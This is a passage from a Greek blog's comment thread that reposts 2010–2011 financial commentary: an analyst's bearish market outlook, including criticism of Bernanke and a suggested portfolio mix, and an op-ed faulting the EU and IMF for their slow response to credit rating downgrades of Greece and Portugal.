    Αναφερόμενος στο γεγονός ότι ο δείκτης Dow Jones [.DJI] του Χρηματιστηρίου της Νέας Υόρκης έχει καταφέρει να διατηρηθεί στο ψυχολογικό επίπεδο των 10.000 μονάδων, ο κ. Ρόζεμπεργκ θεωρεί ότι δεν σημαίνει απολύτως τίποτε. Σύμφωνα με τον ίδιο, ο πραγματικός επενδυτής θα πρέπει να εστιάσει στον Standard & Poor’s 500, που έχει υποχωρήσει κατά 50% από τα υψηλά που είχε αγγίξει στη διάρκεια του πρόσφατου χρηματιστηριακού «ράλι».

    Ο ίδιος διαφωνεί με εκείνους που πιστεύουν ότι οι χρηματιστηριακές αγορές διανύουν απλώς μια φάση διόρθωσης. Αντιθέτως, πιστεύει ότι βρίσκονται σε μια μακροχρόνια φάση πτωτικών τάσεων. Ο κ. Ρόζεμπεργκ εμφανίζεται επικριτικός απέναντι στις αισιόδοξες προβλέψεις του επικεφαλής της Φέντεραλ Ριζέρβ, Μπεν Μπερνάνκι.

    «Αυτό που βλέπω εγώ είναι μείωση των καταναλωτικών δαπανών, δραματική υποχώρηση της αγοράς στέγης, αλλά και των ρυθμών δημιουργίας θέσεων εργασίας στον ιδιωτικό τομέα…. Είναι καιρός να κατέβει ο κ. Μπερνάνκι από τον φιλντισένιο πύργο… Και οι επενδυτές θα πρέπει να είναι επιφυλακτικοί απέναντι σε τόσο αισιόδοξες προβλέψεις», προειδοποιεί ο κ. Ρόζεμπεργκ.

    Ο ίδιος αποφεύγει να δίνει συμβουλές για τη σύσταση χαρτοφυλακίων και τοποθετήσεις σε στοιχεία ενεργητικού. Αυτή τη φορά όμως κάνει μια εξαίρεση και προτείνει στους επενδυτές σύνεση, με χαρτοφυλάκιο που θα αποτελείται 30% από μετοχές, 50% ομόλογα και 20% ρευστό. Τέλος, σε μακροπρόθεσμη βάση εμμένει στην πρόβλεψή του για τιμή του χρυσού στα 3.000 δολάρια ανά ουγκιά.

    Σχόλιο από antonis karas — Ιουνίου 14, 2010 @ 2 :12 μμ | Απάντηση

  5. Οψιμη ήταν για άλλη μια φορά η αντίδραση τόσο της Ευρωπαϊκής Επιτροπής όσο και του Διεθνούς Νομισματικού Ταμείου στα πεπραγμένα των οίκων αξιολόγησης.

    Η υποβάθμιση της πιστοληπτικής ικανότητας της Ελλάδας κατά δύο βαθμίδες και της Πορτογαλίας κατά μία, προκάλεσε αντιδράσεις οι οποίες περιορίστηκαν και πάλι ουσιαστικά σε επίπεδο «κριτικής».

    Πόσο ουσιαστική μπορεί να θεωρηθεί η αναφορά του εκπροσώπου της Επιτροπής ότι «η Κομισιόν έχει εκφράσει επανειλημμένα τις αμφιβολίες της και έχει ασκήσει κριτική για τον τρόπο λειτουργίας των οίκων.

    Επιτεύχθηκε, κάποια πρόοδος σε σχέση με την προώθηση νομοθεσίας σε κοινοτικό επίπεδο, αλλά υπάρχει ακόμη πολλή δουλειά που πρέπει να γίνει για αυστηρότερη νομοθεσία με αποτελεσματικότερους ελέγχους και πλήρη διαφάνεια στη λειτουργία των οίκων.

    Μέχρι το τέλος του καλοκαιριού θα είναι έτοιμη μια δέσμη νομοθετικών προτάσεων προς αυτήν την κατεύθυνση». Αρκεί να θυμίσουμε ότι το θέμα το οίκων αξιολόγησης τέθηκε για πρώτη φορά από τότε που οι λάθος αξιολογήσεις τους δεν μπόρεσαν, πριν από δυόμισι χρόνια, να αποτρέψουν την κρίση των τοξικών χρηματοοικονομικών προϊόντων που οδήγησε το παγκόσμιο χρηματοπιστωτικό σύστημα σε κατάρρευση.

    Από τότε ο ρόλος των οίκων αξιολόγησης όχι μόνο διατηρήθηκε αλλά ενισχύθηκε χωρίς τίποτα να έχει αλλάξει στον έλεγχό τους, στον αυθαίρετο και αδιαφανή τρόπο με τον οποίο παίρνουν τις αποφάσεις τους. Χθες το Νομισματικό Ταμείο με έκθεσή του θεώρησε ότι «οι υποβαθμίσεις στις οποίες έχουν προβεί υπονομεύουν τη χρηματοπιστωτική σταθερότητα ολόκληρης της περιοχής».

    Και σε αυτή την περίπτωση οι κινήσεις που γίνονται βρίσκονται πάντα μερικά βήματα πίσω από τις εξελίξεις. Το παιχνίδι ωστόσο απέναντι σε παρουσίες όπως αυτές δεν παίζεται μόνο σε επίπεδο θεσμικού ελέγχου και νομοθετικού πλαισίου. Ας μην ξεχνάμε άλλωστε ότι όσοι διαμορφώνουν τις τιμές στην αγορά θεωρούν ακόμη τους «χρησμούς» της Standard & Poor’s, της Moody’s και της Fitch αξιόπιστους και πάνω σε αυτούς βασίζουν τις επενδυτικές τους αποφάσεις.

    Αρα η στρατηγική άμυνας που πρέπει να υιοθετήσει η Ευρωπαϊκή Ενωση, το Διεθνές Νομισματικό Ταμείο οι ενδιαφερόμενες χώρες πρέπει να είναι πολύ πιο σύνθετη, αποτελεσματική, ταχύτατη και να αναπτυχθεί όχι μόνο σε θεσμικό επίπεδο.

    ΝΙΚΟΣ ΦΡΑΝΤΖΗΣ – nfran@naftemporiki.gr

    Σχόλιο από thelastrealanwnymous — Απρίλιος 1, 2011 @ 10 :09 πμ | Απάντηση


RSS feed for comments on this post. TrackBack URI

Σχολιάστε

Εισάγετε τα παρακάτω στοιχεία ή επιλέξτε ένα εικονίδιο για να συνδεθείτε:

Λογότυπο WordPress.com

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό WordPress.com. Αποσύνδεση / Αλλαγή )

Φωτογραφία Twitter

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Twitter. Αποσύνδεση / Αλλαγή )

Φωτογραφία Facebook

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Facebook. Αποσύνδεση / Αλλαγή )

Φωτογραφία Google+

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Google+. Αποσύνδεση / Αλλαγή )

Σύνδεση με %s

Δημιουργήστε ένα δωρεάν ιστότοπο ή ιστολόγιο στο WordPress.com.

Αρέσει σε %d bloggers: